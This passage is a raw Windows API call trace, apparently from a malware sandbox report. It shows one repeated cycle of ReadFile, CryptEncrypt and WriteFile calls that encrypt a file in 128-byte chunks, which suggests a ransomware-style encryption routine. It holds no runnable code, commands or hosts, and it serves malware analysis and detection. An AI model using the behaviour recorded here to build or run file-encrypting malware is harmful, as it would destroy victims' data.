out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.105] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.105] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.105] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.106] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.106] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.106] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.106] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.106] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.106] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.107] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.107] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.107] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.107] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.107] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.108] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.108] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.108] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.108] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.108] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.108] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.108] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.108] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.108] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.108] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.108] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.109] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.109] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.109] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.109] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.109] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.110] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.110] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.110] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.110] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.110] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.110] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.111] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.111] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.111] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.111] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.111] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.111] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.112] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.112] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.112] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.112] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.112] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.113] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.113] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.113] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.113] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: 